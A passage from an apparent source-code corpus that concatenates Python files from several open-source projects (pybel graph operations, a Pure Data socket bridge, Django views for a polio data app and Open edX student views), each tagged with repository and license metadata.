:param use_tqdm: Should a progress bar be displayed?
:return: A merged graph
:rtype: BELGraph
Example usage:
>>> import pybel
>>> g = pybel.from_bel_script('...')
>>> h = pybel.from_bel_script('...')
>>> k = pybel.from_bel_script('...')
>>> merged = union([g, h, k])
"""
it = iter(graphs)
if use_tqdm:
it = tqdm(it, desc="taking union")
try:
target = next(it)
except StopIteration as e:
raise ValueError("no graphs given") from e
try:
graph = next(it)
except StopIteration:
return target
else:
target = target.copy()
left_full_join(target, graph)
for graph in it:
left_full_join(target, graph)
return target
def left_node_intersection_join(g, h):
"""Take the intersection over two graphs.
This intersection of two graphs is defined by the union of the
sub-graphs induced over the intersection of their nodes
:param BELGraph g: A BEL graph
:param BELGraph h: A BEL graph
:rtype: BELGraph
Example usage:
>>> import pybel
>>> g = pybel.from_bel_script('...')
>>> h = pybel.from_bel_script('...')
>>> merged = left_node_intersection_join(g, h)
"""
intersecting = set(g).intersection(set(h))
g_inter = subgraph(g, intersecting)
h_inter = subgraph(h, intersecting)
left_full_join(g_inter, h_inter)
return g_inter
def node_intersection(graphs):
"""Take the node intersection over a collection of graphs into a new graph.
This intersection is defined the same way as by :func:`left_node_intersection_join`
:param iter[BELGraph] graphs: An iterable of graphs. Since it's iterated over twice, it gets converted to a
tuple first, so this isn't a safe operation for infinite lists.
:rtype: BELGraph
Example usage:
>>> import pybel
>>> g = pybel.from_bel_script('...')
>>> h = pybel.from_bel_script('...')
>>> k = pybel.from_bel_script('...')
>>> merged = node_intersection([g, h, k])
"""
graphs = tuple(graphs)
n_graphs = len(graphs)
if n_graphs == 0:
raise ValueError("no graphs given")
if n_graphs == 1:
return graphs[0]
nodes = set(graphs[0].nodes())
for graph in graphs[1:]:
nodes.intersection_update(graph)
return union(subgraph(graph, nodes) for graph in graphs)
| pybel/pybel | src/pybel/struct/operations.py | Python | mit | 5,181 |
'''
Split incoming events in various ways.
'''
import libs.modifiers
class Copy(libs.modifiers.Modifier):
def __init__(self):
self.inputs = {
'main': None
}
self.outputs = {
'copy': []
}
| aj00200/midifire | src/libs/modifiers/splitters.py | Python | gpl-3.0 | 249 |
from geotrek.common.mixins import NoDeleteMixin
from mapentity.management.commands.prepare_map_images import Command as MapentityCommand
class Command(MapentityCommand):
"""Override mapentity command of the same name to exclude deleted objects."""
def get_instances(self, model):
if issubclass(model, NoDeleteMixin):
return model.objects.existing()
else:
return model.objects.all()
| mabhub/Geotrek | geotrek/common/management/commands/prepare_map_images.py | Python | bsd-2-clause | 433 |
##########################################################
##########################################################
# description: class that handles pd communication
#
# important: based on Frank Barknecht script at:
# http://markmail.org/message/ohuwrz77hwo3bcwp#query:python%20pdsend+page:1+mid:ybdc6esbu7q53otu+state:results
#
# autor: jeraman
# date: 06/04/2009
##########################################################
##########################################################
#import sys
from threading import *
from socket import *
from time import *
from subprocess import *
from basic_classes.box import *
from basic_classes.number import *
from basic_classes.symbol import *
from basic_classes.connection import *
# a thread class that we're gonna use for calling the server.pd patch
class RemotePd ( Thread ):
def __init__(self, nogui, pd_dir, server_dir):
Thread.__init__(self)
self.nogui = nogui
self.server_dir = server_dir
self.pd_dir = pd_dir
#run method
def run ( self ):
if self.nogui:
temp = "cd %s && pd -nogui %s/server.pd" %(self.pd_dir, self.server_dir)
else:
temp = "pd -nogui %s/server.pd" %(self.server_dir)
self.p = Popen(temp, shell=True)
#communication class
class Communication():
#constructor
def __init__(self, nogui):
# variables from config file
self.pd_dir = ""
self.server_dir = "libs/pyata/src/aux_patches"
self.host = "localhost"
self.snd_port = ""
self.rcv_port = ""
self.load_config() #loads the properties.config
#class variables
self.snd_socket = socket(AF_INET, SOCK_STREAM)
self.rcv_socket = socket(AF_INET, SOCK_STREAM)
self.thread=RemotePd(nogui, self.pd_dir, self.server_dir)
self.file = open(self.server_dir+"/server.pd","r")
self.rcv = ""
#loads the properties.config
def load_config(self):
config = open("libs/pyata/properties.config","r")
#reads the pd dir
temp = config.readline()
while(temp[0]=="#"):
temp = config.readline()
self.pd_dir = temp[:len(temp)-1]
#reads the server dir
temp = config.readline()
while(temp[0]=="#"):
temp = config.readline()
self.rcv_port = int(temp)
#reads the server dir
temp = config.readline()
while(temp[0]=="#"):
temp = config.readline()
self.snd_port = int(temp)
config.close()
#connecting to pd
def init_pd(self):
print "initializing server.pd..."
self.thread.start()
sleep(5)
try:
self.snd_socket.connect((self.host, self.snd_port))
self.rcv_socket.bind((self.host, self.rcv_port))
self.rcv_socket.listen(1)
self.rcv, addr = self.rcv_socket.accept()
self.init_pyata()
print "connecting with pd"
return True
except error, err:
print "Error connecting to %s:%d: %s" % (self.host, self.snd_port, err)
return False
#init some socket variables
def init_pyata(self):
Box.set_sender(self)
Connection.set_sender(self)
Number.init_socket(self.rcv)
Symbol.init_socket(self.rcv)
#sending a command to pd
def send_pd(self, commands):
try:
self.snd_socket.send(commands)
return True
except error, err:
print "Error sending message %s : %s" % (message, err)
return False
#closing connection
def finish_pd(self):
try:
temp = "killall pd"
p = Popen(temp, shell=True)
self.snd_socket.close()
self.rcv_socket.close()
self.file.close()
print "closing connection with pd"
return True
except error, err:
print "Error sending message %s : %s" % (message, err)
return False
def save_state(self, canvas):
self.snd_socket.send(canvas + "menusave ; ")
sleep(0.1)
#returns the useful content of a file
def get_file(self):
self.file.seek(0)
text = self.file.read()
i = text.find("new")
text = text[(i+7):(len(text))]
i = text.find("pd new;")
text = text[0:(i-18)]
return text
#setting the canvas to where the messages are going
def set_canvas(self, canvas):
self.canvas=canvas
#aux static function to debug this class
@staticmethod
def debug():
c = Communication(False)
c.init_pd()
sleep(5)
c.finish_pd()
| husk00/pantaliQa | libs/pyata/src/communication.py | Python | gpl-2.0 | 4,921 |
import json
from pprint import pprint
import datetime
from datetime import date
import re
import itertools
from django.shortcuts import render_to_response
from django.http import HttpResponseRedirect
from django.http import HttpResponse
from django.core.urlresolvers import reverse_lazy, reverse, resolve
from django.core.exceptions import ObjectDoesNotExist
from django.core import serializers
from django.views import generic
from django.views.decorators.cache import cache_control as django_cache_control
from django.contrib.auth.models import User,Group
from django.contrib.auth.decorators import login_required
from django.template import RequestContext
from pandas import read_csv
from pandas import DataFrame
from functools import partial
from datapoints.models import *
from datapoints.forms import *
from datapoints import cache_tasks
from datapoints.mixins import PermissionRequiredMixin
class IndexView(generic.ListView):
paginate_by = 20
def get_queryset(self):
return self.model.objects.order_by('-created_at')
###################
###################
### DATA POINTS ###
###################
###################
class DataPointIndexView(IndexView):
model=DataPoint
template_name = 'datapoints/index.html'
context_object_name = 'top_datapoints'
def data_entry(request):
return render_to_response('data-entry/index.html',
context_instance=RequestContext(request))
def dashboard_list(request):
return render_to_response('dashboard-builder/list.html',
context_instance=RequestContext(request))
def dashboard_builder(request,dashboard_id=None):
return render_to_response('dashboard-builder/index.html', {'dashboard_id': dashboard_id },
context_instance=RequestContext(request))
def chart_builder(request,dashboard_id):
return render_to_response('dashboard-builder/chart_builder.html', {'dashboard_id': dashboard_id },
context_instance=RequestContext(request))
class DashBoardView(IndexView):
paginate_by = 50
template_name = 'dashboard/index.html'
context_object_name = 'user_dashboard'
def get_queryset(self):
return DataPoint.objects.all()[:1]
#################
### CAMPAIGNS ###
#################
class CampaignCreateView(PermissionRequiredMixin,generic.CreateView):
model = Campaign
success_url = '/ufadmin/campaigns'
template_name = 'campaigns/create.html'
permission_required = 'datapoints.add_campaign'
fields = ['office','campaign_type','start_date','end_date']
class CampaignUpdateView(PermissionRequiredMixin,generic.UpdateView):
model=Campaign
success_url = '/ufadmin/campaigns'
template_name = 'campaigns/create.html'
form_class = CampaignForm
# permission_required = 'datapoints.change_campaign'
###############
### REGIONS ###
###############
class RegionCreateView(PermissionRequiredMixin,generic.CreateView):
model=Region
template_name='regions/create.html'
permission_required = 'datapoints.add_region'
form_class = RegionForm
success_url= '/ufadmin/regions'
def form_valid(self, form):
# this inserts into the changed_by field with the user who made the insert
obj = form.save(commit=False)
obj.changed_by = self.request.user
obj.save()
return HttpResponseRedirect(self.success_url)
class RegionUpdateView(PermissionRequiredMixin,generic.UpdateView):
model = Region
success_url = '/ufadmin/regions'
template_name = 'regions/update.html'
permission_required = 'datapoints.change_region'
##############################
##############################
#### FUNCTION BASED VIEWS ####
##############################
##############################
def manage_data_refresh(request):
cache_jobs = CacheJob.objects.all().\
exclude(response_msg='NOTHING_TO_PROCESS').order_by('-id')
return render_to_response('manage_data_refresh.html',{'cache_jobs':cache_jobs},
context_instance=RequestContext(request))
def refresh_cache(request):
cr = cache_tasks.CacheRefresh()
return HttpResponseRedirect(reverse('datapoints:manage_data_refresh'))
def parse_url_args(request,keys):
request_meta = {}
for k in keys:
try:
request_meta[k] = request.GET[k]
except KeyError:
request_meta[k] = None
return request_meta
def refresh_metadata(request):
'''
This is what happens when you click the "refresh_metadata" button
'''
indicator_cache_data = cache_tasks.cache_indicator_abstracted()
user_cache_data = cache_tasks.cache_user_abstracted()
campaign_cache_data = cache_tasks.cache_campaign_abstracted()
region_tree_cache_data = cache_tasks.cache_region_tree()
source_object_cache = cache_tasks.update_source_object_names()
return HttpResponseRedirect(reverse('datapoints:manage_data_refresh'))
class GroupCreateView(PermissionRequiredMixin, generic.CreateView):
model = Group
template_name = 'group_create.html'
class GroupEditView(PermissionRequiredMixin,generic.UpdateView):
model = Group
template_name = 'group_update.html'
def get_success_url(self):
requested_group_id = self.get_object().id
return reverse_lazy('datapoints:group_update',kwargs={'pk':
requested_group_id})
def get_context_data(self, **kwargs):
context = super(GroupEditView, self).get_context_data(**kwargs)
group_obj = self.get_object()
context['group_id'] = group_obj.id
return context
class UserCreateView(PermissionRequiredMixin,generic.CreateView):
model = User
template_name = 'user_create.html'
form_class = UserCreateForm
def form_valid(self, form):
new_user = form.save()
return HttpResponseRedirect(reverse('datapoints:user_update', \
kwargs={'pk':new_user.id}))
class UserEditView(PermissionRequiredMixin,generic.UpdateView):
model = User
template_name = 'user_edit.html'
form_class = UserEditForm
def get_success_url(self):
requested_user_id = self.get_object().id
return reverse_lazy('datapoints:user_update',kwargs={'pk':
requested_user_id})
def get_context_data(self, **kwargs):
context = super(UserEditView, self).get_context_data(**kwargs)
user_obj = self.get_object()
context['user_id'] = user_obj.id
return context
class IndicatorCreateView(PermissionRequiredMixin,generic.CreateView):
model = User
template_name = 'user_create.html'
form_class = IndicatorForm
def form_valid(self, form):
new_indicator = form.save()
return HttpResponseRedirect(reverse('datapoints:update_indicator', \
kwargs={'pk':new_indicator.id}))
class IndicatorEditView(PermissionRequiredMixin,generic.UpdateView):
model = Indicator
template_name = 'indicators/upsert.html'
form_class = IndicatorForm
def get_success_url(self):
new_indicator_id = self.get_object().id
return reverse_lazy('datapoints:update_indicator',kwargs={'pk':
new_indicator_id})
def get_context_data(self, **kwargs):
context = super(IndicatorEditView, self).get_context_data(**kwargs)
indicator_obj = self.get_object()
context['pk'] = indicator_obj.id
return context
def html_decorator(func):
"""
This decorator wraps the output of the django debug tooldbar in html.
(From http://stackoverflow.com/a/14647943)
"""
def _decorated(*args, **kwargs):
response = func(*args, **kwargs)
wrapped = ("<html><body>",
response.content,
"</body></html>")
return HttpResponse(wrapped)
return _decorated
@html_decorator
def debug(request):
"""
Debug endpoint that uses the html_decorator,
"""
path = request.META.get("PATH_INFO")
api_url = path.replace("debug/", "")
view = resolve(api_url)
accept = request.META.get("HTTP_ACCEPT")
accept += ",application/json"
request.META["HTTP_ACCEPT"] = accept
res = view.func(request, **view.kwargs)
return HttpResponse(res._container)
| unicef/polio | datapoints/views.py | Python | agpl-3.0 | 8,266 |
"""
Student Views
"""
import datetime
import logging
import uuid
import json
import warnings
from collections import defaultdict
from urlparse import urljoin, urlsplit, parse_qs, urlunsplit
from django.views.generic import TemplateView
from pytz import UTC
from requests import HTTPError
from ipware.ip import get_ip
import edx_oauth2_provider
from django.conf import settings
from django.contrib.auth import logout, authenticate, login
from django.contrib.auth.models import User, AnonymousUser
from django.contrib.auth.decorators import login_required
from django.contrib.auth.views import password_reset_confirm
from django.contrib import messages
from django.core.context_processors import csrf
from django.core import mail
from django.core.urlresolvers import reverse, NoReverseMatch, reverse_lazy
from django.core.validators import validate_email, ValidationError
from django.db import IntegrityError, transaction
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseForbidden, HttpResponseServerError, Http404
from django.shortcuts import redirect
from django.utils.encoding import force_bytes, force_text
from django.utils.translation import ungettext
from django.utils.http import base36_to_int, urlsafe_base64_encode, urlencode
from django.utils.translation import ugettext as _, get_language
from django.views.decorators.csrf import csrf_exempt, ensure_csrf_cookie
from django.views.decorators.http import require_POST, require_GET
from django.db.models.signals import post_save
from django.dispatch import receiver, Signal
from django.template.response import TemplateResponse
from provider.oauth2.models import Client
from ratelimitbackend.exceptions import RateLimitException
from social.apps.django_app import utils as social_utils
from social.backends import oauth as social_oauth
from social.exceptions import AuthException, AuthAlreadyAssociated
from edxmako.shortcuts import render_to_response, render_to_string
from course_modes.models import CourseMode
from shoppingcart.api import order_history
from student.models import (
Registration, UserProfile,
PendingEmailChange, CourseEnrollment, CourseEnrollmentAttribute, unique_id_for_user,
CourseEnrollmentAllowed, UserStanding, LoginFailures,
create_comments_service_user, PasswordHistory, UserSignupSource,
DashboardConfiguration, LinkedInAddToProfileConfiguration, ManualEnrollmentAudit, ALLOWEDTOENROLL_TO_ENROLLED,
LogoutViewConfiguration)
from student.forms import AccountCreationForm, PasswordResetFormNoActive, get_registration_extension_form
from student.tasks import send_activation_email
from lms.djangoapps.commerce.utils import EcommerceService # pylint: disable=import-error
from lms.djangoapps.verify_student.models import SoftwareSecurePhotoVerification # pylint: disable=import-error
from bulk_email.models import Optout, BulkEmailFlag # pylint: disable=import-error
from certificates.models import CertificateStatuses, certificate_status_for_student
from certificates.api import ( # pylint: disable=import-error
get_certificate_url,
has_html_certificates_enabled,
)
from xmodule.modulestore.django import modulestore
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from opaque_keys.edx.locator import CourseLocator
from collections import namedtuple
from courseware.courses import get_courses, sort_by_announcement, sort_by_start_date # pylint: disable=import-error
from courseware.access import has_access
from django_comment_common.models import Role
from external_auth.models import ExternalAuthMap
import external_auth.views
from external_auth.login_and_register import (
login as external_auth_login,
register as external_auth_register
)
from lang_pref import LANGUAGE_KEY
import track.views
import dogstats_wrapper as dog_stats_api
from util.db import outer_atomic
from util.json_request import JsonResponse
from util.bad_request_rate_limiter import BadRequestRateLimiter
from util.milestones_helpers import (
get_pre_requisite_courses_not_completed,
)
from util.password_policy_validators import validate_password_strength
import third_party_auth
from third_party_auth import pipeline, provider
from student.helpers import (
check_verify_status_by_course,
auth_pipeline_urls, get_next_url_for_login_page,
DISABLE_UNENROLL_CERT_STATES,
)
from student.cookies import set_logged_in_cookies, delete_logged_in_cookies
from student.models import anonymous_id_for_user, UserAttribute, EnrollStatusChange
from shoppingcart.models import DonationConfiguration, CourseRegistrationCode
from embargo import api as embargo_api
import analytics
from eventtracking import tracker
# Note that this lives in LMS, so this dependency should be refactored.
from notification_prefs.views import enable_notifications
from openedx.core.djangoapps.credit.email_utils import get_credit_provider_display_names, make_providers_strings
from openedx.core.djangoapps.user_api.preferences import api as preferences_api
from openedx.core.djangoapps.programs.models import ProgramsApiConfig
from openedx.core.djangoapps.programs import utils as programs_utils
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from openedx.core.djangoapps.theming import helpers as theming_helpers
log = logging.getLogger("edx.student")
AUDIT_LOG = logging.getLogger("audit")
ReverifyInfo = namedtuple('ReverifyInfo', 'course_id course_name course_number date status display') # pylint: disable=invalid-name
SETTING_CHANGE_INITIATED = 'edx.user.settings.change_initiated'
# Used as the name of the user attribute for tracking affiliate registrations
REGISTRATION_AFFILIATE_ID = 'registration_affiliate_id'
# used to announce a registration
REGISTER_USER = Signal(providing_args=["user", "profile"])
# Disable this warning because it doesn't make sense to completely refactor tests to appease Pylint
# pylint: disable=logging-format-interpolation
def csrf_token(context):
"""A csrf token that can be included in a form."""
token = context.get('csrf_token', '')
if token == 'NOTPROVIDED':
return ''
return (u'<div style="display:none"><input type="hidden"'
' name="csrfmiddlewaretoken" value="%s" /></div>' % (token))
# NOTE: This view is not linked to directly--it is called from
# branding/views.py:index(), which is cached for anonymous users.
# This means that it should always return the same thing for anon
# users. (in particular, no switching based on query params allowed)
def index(request, extra_context=None, user=AnonymousUser()):
"""
Render the edX main page.
extra_context is used to allow immediate display of certain modal windows, eg signup,
as used by external_auth.
"""
if extra_context is None:
extra_context = {}
courses = get_courses(user)
if configuration_helpers.get_value(
"ENABLE_COURSE_SORTING_BY_START_DATE",
settings.FEATURES["ENABLE_COURSE_SORTING_BY_START_DATE"],
):
courses = sort_by_start_date(courses)
else:
courses = sort_by_announcement(courses)
context = {'courses': courses}
context['homepage_overlay_html'] = configuration_helpers.get_value('homepage_overlay_html')
# This appears to be an unused context parameter, at least for the master templates...
context['show_partners'] = configuration_helpers.get_value('show_partners', True)
# TO DISPLAY A YOUTUBE WELCOME VIDEO
# 1) Change False to True
context['show_homepage_promo_video'] = configuration_helpers.get_value('show_homepage_promo_video', False)
# 2) Add your video's YouTube ID (11 chars, eg "123456789xX"), or specify via site configuration
# Note: This value should be moved into a configuration setting and plumbed-through to the
# context via the site configuration workflow, versus living here
youtube_video_id = configuration_helpers.get_value('homepage_promo_video_youtube_id', "your-youtube-id")
context['homepage_promo_video_youtube_id'] = youtube_video_id
# allow for theme override of the courses list
context['courses_list'] = theming_helpers.get_template_path('courses_list.html')
# Insert additional context for use in the template
context.update(extra_context)
return render_to_response('index.html', context)
def process_survey_link(survey_link, user):
"""
If {UNIQUE_ID} appears in the link, replace it with a unique id for the user.
Currently, this is sha1(user.username). Otherwise, return survey_link.
"""
return survey_link.format(UNIQUE_ID=unique_id_for_user(user))
def cert_info(user, course_overview, course_mode):
"""
Get the certificate info needed to render the dashboard section for the given
student and course.
Arguments:
user (User): A user.
course_overview (CourseOverview): A course.
course_mode (str): The enrollment mode (honor, verified, audit, etc.)
Returns:
dict: Empty dict if certificates are disabled or hidden, or a dictionary with keys:
'status': one of 'generating', 'ready', 'notpassing', 'processing', 'restricted'
'show_download_url': bool
'download_url': url, only present if show_download_url is True
'show_disabled_download_button': bool -- true if state is 'generating'
'show_survey_button': bool
'survey_url': url, only if show_survey_button is True
'grade': if status is not 'processing'
'can_unenroll': if status allows for unenrollment
"""
if not course_overview.may_certify():
return {}
return _cert_info(
user,
course_overview,
certificate_status_for_student(user, course_overview.id),
course_mode
)
def reverification_info(statuses):
"""
Returns reverification-related information for *all* of user's enrollments whose
reverification status is in statuses.
Args:
statuses (list): a list of reverification statuses we want information for
example: ["must_reverify", "denied"]
Returns:
dictionary of lists: dictionary with one key per status, e.g.
dict["must_reverify"] = []
dict["must_reverify"] = [some information]
"""
reverifications = defaultdict(list)
# Sort the data by the reverification_end_date
for status in statuses:
if reverifications[status]:
reverifications[status].sort(key=lambda x: x.date)
return reverifications
def get_course_enrollments(user, org_to_include, orgs_to_exclude):
"""
Given a user, return a filtered set of his or her course enrollments.
Arguments:
user (User): the user in question.
org_to_include (str): If not None, ONLY courses of this org will be returned.
orgs_to_exclude (list[str]): If org_to_include is not None, this
argument is ignored. Else, courses of this org will be excluded.
Returns:
generator[CourseEnrollment]: a sequence of enrollments to be displayed
on the user's dashboard.
"""
for enrollment in CourseEnrollment.enrollments_for_user(user):
# If the course is missing or broken, log an error and skip it.
course_overview = enrollment.course_overview
if not course_overview:
log.error(
"User %s enrolled in broken or non-existent course %s",
user.username,
enrollment.course_id
)
continue
# Filter out anything that is not attributed to the current ORG.
if org_to_include and course_overview.location.org != org_to_include:
continue
# Conversely, filter out any enrollments with courses attributed to current ORG.
elif course_overview.location.org in orgs_to_exclude:
continue
# Else, include the enrollment.
else:
yield enrollment
def _cert_info(user, course_overview, cert_status, course_mode): # pylint: disable=unused-argument
"""
Implements the logic for cert_info -- split out for testing.
Arguments:
user (User): A user.
course_overview (CourseOverview): A course.
course_mode (str): The enrollment mode (honor, verified, audit, etc.)
"""
# simplify the status for the template using this lookup table
template_state = {
CertificateStatuses.generating: 'generating',
CertificateStatuses.downloadable: 'ready',
CertificateStatuses.notpassing: 'notpassing',
CertificateStatuses.restricted: 'restricted',
CertificateStatuses.auditing: 'auditing',
CertificateStatuses.audit_passing: 'auditing',
CertificateStatuses.audit_notpassing: 'auditing',
CertificateStatuses.unverified: 'unverified',
}
default_status = 'processing'
default_info = {
'status': default_status,
'show_disabled_download_button': False,
'show_download_url': False,
'show_survey_button': False,
'can_unenroll': True,
}
if cert_status is None:
return default_info
is_hidden_status = cert_status['status'] in ('unavailable', 'processing', 'generating', 'notpassing', 'auditing')
if course_overview.certificates_display_behavior == 'early_no_info' and is_hidden_status:
return {}
status = template_state.get(cert_status['status'], default_status)
status_dict = {
'status': status,
'show_download_url': status == 'ready',
'show_disabled_download_button': status == 'generating',
'mode': cert_status.get('mode', None),
'linked_in_url': None,
'can_unenroll': status not in DISABLE_UNENROLL_CERT_STATES,
}
if (status in ('generating', 'ready', 'notpassing', 'restricted', 'auditing', 'unverified') and
course_overview.end_of_course_survey_url is not None):
status_dict.update({
'show_survey_button': True,
'survey_url': process_survey_link(course_overview.end_of_course_survey_url, user)})
else:
status_dict['show_survey_button'] = False
if status == 'ready':
# showing the certificate web view button if certificate is ready state and feature flags are enabled.
if has_html_certificates_enabled(course_overview.id, course_overview):
if course_overview.has_any_active_web_certificate:
status_dict.update({
'show_cert_web_view': True,
'cert_web_view_url': get_certificate_url(course_id=course_overview.id, uuid=cert_status['uuid'])
})
else:
# don't show download certificate button if we don't have an active certificate for course
status_dict['show_download_url'] = False
elif 'download_url' not in cert_status:
log.warning(
u"User %s has a downloadable cert for %s, but no download url",
user.username,
course_overview.id
)
return default_info
else:
status_dict['download_url'] = cert_status['download_url']
# If enabled, show the LinkedIn "add to profile" button
# Clicking this button sends the user to LinkedIn where they
# can add the certificate information to their profile.
linkedin_config = LinkedInAddToProfileConfiguration.current()
# posting certificates to LinkedIn is not currently
# supported in White Labels
if linkedin_config.enabled and not theming_helpers.is_request_in_themed_site():
status_dict['linked_in_url'] = linkedin_config.add_to_profile_url(
course_overview.id,
course_overview.display_name,
cert_status.get('mode'),
cert_status['download_url']
)
if status in ('generating', 'ready', 'notpassing', 'restricted', 'auditing', 'unverified'):
if 'grade' not in cert_status:
# Note: as of 11/20/2012, we know there are students in this state-- cs169.1x,
# who need to be regraded (we weren't tracking 'notpassing' at first).
# We can add a log.warning here once we think it shouldn't happen.
return default_info
else:
status_dict['grade'] = cert_status['grade']
return status_dict
@ensure_csrf_cookie
def signin_user(request):
"""Deprecated. To be replaced by :class:`student_account.views.login_and_registration_form`."""
external_auth_response = external_auth_login(request)
if external_auth_response is not None:
return external_auth_response
# Determine the URL to redirect to following login:
redirect_to = get_next_url_for_login_page(request)
if request.user.is_authenticated():
return redirect(redirect_to)
third_party_auth_error = None
for msg in messages.get_messages(request):
if msg.extra_tags.split()[0] == "social-auth":
# msg may or may not be translated. Try translating [again] in case we are able to:
third_party_auth_error = _(unicode(msg)) # pylint: disable=translation-of-non-string
break
context = {
'login_redirect_url': redirect_to, # This gets added to the query string of the "Sign In" button in the header
# Bool injected into JS to submit form if we're inside a running third-
# party auth pipeline; distinct from the actual instance of the running
# pipeline, if any.
'pipeline_running': 'true' if pipeline.running(request) else 'false',
'pipeline_url': auth_pipeline_urls(pipeline.AUTH_ENTRY_LOGIN, redirect_url=redirect_to),
'platform_name': configuration_helpers.get_value(
'platform_name',
settings.PLATFORM_NAME
),
'third_party_auth_error': third_party_auth_error
}
return render_to_response('login.html', context)
@ensure_csrf_cookie
def register_user(request, extra_context=None):
"""Deprecated. To be replaced by :class:`student_account.views.login_and_registration_form`."""
# Determine the URL to redirect to following login:
redirect_to = get_next_url_for_login_page(request)
if request.user.is_authenticated():
return redirect(redirect_to)
external_auth_response = external_auth_register(request)
if external_auth_response is not None:
return external_auth_response
context = {
'login_redirect_url': redirect_to, # This gets added to the query string of the "Sign In" button in the header
'email': '',
'name': '',
'running_pipeline': None,
'pipeline_urls': auth_pipeline_urls(pipeline.AUTH_ENTRY_REGISTER, redirect_url=redirect_to),
'platform_name': configuration_helpers.get_value(
'platform_name',
settings.PLATFORM_NAME
),
'selected_provider': '',
'username': '',
}
if extra_context is not None:
context.update(extra_context)
if context.get("extauth_domain", '').startswith(external_auth.views.SHIBBOLETH_DOMAIN_PREFIX):
return render_to_response('register-shib.html', context)
# If third-party auth is enabled, prepopulate the form with data from the
# selected provider.
if third_party_auth.is_enabled() and pipeline.running(request):
running_pipeline = pipeline.get(request)
current_provider = provider.Registry.get_from_pipeline(running_pipeline)
if current_provider is not None:
overrides = current_provider.get_register_form_data(running_pipeline.get('kwargs'))
overrides['running_pipeline'] = running_pipeline
overrides['selected_provider'] = current_provider.name
context.update(overrides)
return render_to_response('register.html', context)
def complete_course_mode_info(course_id, enrollment, modes=None):
"""
We would like to compute some more information from the given course modes
and the user's current enrollment
Returns the given information:
- whether to show the course upsell information
- numbers of days until they can't upsell anymore
"""
if modes is None:
modes = CourseMode.modes_for_course_dict(course_id)
mode_info = {'show_upsell': False, 'days_for_upsell': None}
# we want to know if the user is already enrolled as verified or credit and
# if verified is an option.
if CourseMode.VERIFIED in modes and enrollment.mode in CourseMode.UPSELL_TO_VERIFIED_MODES:
mode_info['show_upsell'] = True
mode_info['verified_sku'] = modes['verified'].sku
mode_info['verified_bulk_sku'] = modes['verified'].bulk_sku
# if there is an expiration date, find out how long from now it is
if modes['verified'].expiration_datetime:
today = datetime.datetime.now(UTC).date()
mode_info['days_for_upsell'] = (modes['verified'].expiration_datetime.date() - today).days
return mode_info
def is_course_blocked(request, redeemed_registration_codes, course_key):
"""Checking either registration is blocked or not ."""
blocked = False
for redeemed_registration in redeemed_registration_codes:
# registration codes may be generated via Bulk Purchase Scenario
# we have to check only for the invoice generated registration codes
# that their invoice is valid or not
if redeemed_registration.invoice_item:
if not redeemed_registration.invoice_item.invoice.is_valid:
blocked = True
# disabling email notifications for unpaid registration courses
Optout.objects.get_or_create(user=request.user, course_id=course_key)
log.info(
u"User %s (%s) opted out of receiving emails from course %s",
request.user.username,
request.user.email,
course_key,
)
track.views.server_track(
request,
"change-email1-settings",
{"receive_emails": "no", "course": course_key.to_deprecated_string()},
page='dashboard',
)
break
return blocked
@login_required
@ensure_csrf_cookie
def dashboard(request):
user = request.user
platform_name = configuration_helpers.get_value("platform_name", settings.PLATFORM_NAME)
# we want to filter and only show enrollments for courses within
# the 'ORG' defined in configuration.
course_org_filter = configuration_helpers.get_value('course_org_filter')
# Let's filter out any courses in an "org" that has been declared to be
# in a configuration
org_filter_out_set = configuration_helpers.get_all_orgs()
# remove our current org from the "filter out" list, if applicable
if course_org_filter:
org_filter_out_set.remove(course_org_filter)
# Build our (course, enrollment) list for the user, but ignore any courses that no
# longer exist (because the course IDs have changed). Still, we don't delete those
# enrollments, because it could have been a data push snafu.
course_enrollments = list(get_course_enrollments(user, course_org_filter, org_filter_out_set))
# sort the enrollment pairs by the enrollment date
course_enrollments.sort(key=lambda x: x.created, reverse=True)
# Retrieve the course modes for each course
enrolled_course_ids = [enrollment.course_id for enrollment in course_enrollments]
__, unexpired_course_modes = CourseMode.all_and_unexpired_modes_for_courses(enrolled_course_ids)
course_modes_by_course = {
course_id: {
mode.slug: mode
for mode in modes
}
for course_id, modes in unexpired_course_modes.iteritems()
}
# Check to see if the student has recently enrolled in a course.
# If so, display a notification message confirming the enrollment.
enrollment_message = _create_recent_enrollment_message(
course_enrollments, course_modes_by_course
)
course_optouts = Optout.objects.filter(user=user).values_list('course_id', flat=True)
message = ""
if not user.is_active:
message = render_to_string(
'registration/activate_account_notice.html',
{'email': user.email, 'platform_name': platform_name}
)
# Global staff can see what courses errored on their dashboard
staff_access = False
errored_courses = {}
if has_access(user, 'staff', 'global'):
# Show any courses that errored on load
staff_access = True
errored_courses = modulestore().get_errored_courses()
show_courseware_links_for = frozenset(
enrollment.course_id for enrollment in course_enrollments
if has_access(request.user, 'load', enrollment.course_overview)
and has_access(request.user, 'view_courseware_with_prerequisites', enrollment.course_overview)
)
# Find programs associated with courses being displayed. This information
# is passed in the template context to allow rendering of program-related
# information on the dashboard.
meter = programs_utils.ProgramProgressMeter(user, enrollments=course_enrollments)
programs_by_run = meter.engaged_programs(by_run=True)
# Construct a dictionary of course mode information
# used to render the course list. We re-use the course modes dict
# we loaded earlier to avoid hitting the database.
course_mode_info = {
enrollment.course_id: complete_course_mode_info(
enrollment.course_id, enrollment,
modes=course_modes_by_course[enrollment.course_id]
)
for enrollment in course_enrollments
}
# Determine the per-course verification status
# This is a dictionary in which the keys are course locators
# and the values are one of:
#
# VERIFY_STATUS_NEED_TO_VERIFY
# VERIFY_STATUS_SUBMITTED
# VERIFY_STATUS_APPROVED
# VERIFY_STATUS_MISSED_DEADLINE
#
# Each of which correspond to a particular message to display
# next to the course on the dashboard.
#
# If a course is not included in this dictionary,
# there is no verification messaging to display.
verify_status_by_course = check_verify_status_by_course(user, course_enrollments)
cert_statuses = {
enrollment.course_id: cert_info(request.user, enrollment.course_overview, enrollment.mode)
for enrollment in course_enrollments
}
# only show email settings for Mongo course and when bulk email is turned on
show_email_settings_for = frozenset(
enrollment.course_id for enrollment in course_enrollments if (
BulkEmailFlag.feature_enabled(enrollment.course_id)
)
)
# Verification Attempts
# Used to generate the "you must reverify for course x" banner
verification_status, verification_msg = SoftwareSecurePhotoVerification.user_status(user)
# Gets data for midcourse reverifications, if any are necessary or have failed
statuses = ["approved", "denied", "pending", "must_reverify"]
reverifications = reverification_info(statuses)
show_refund_option_for = frozenset(
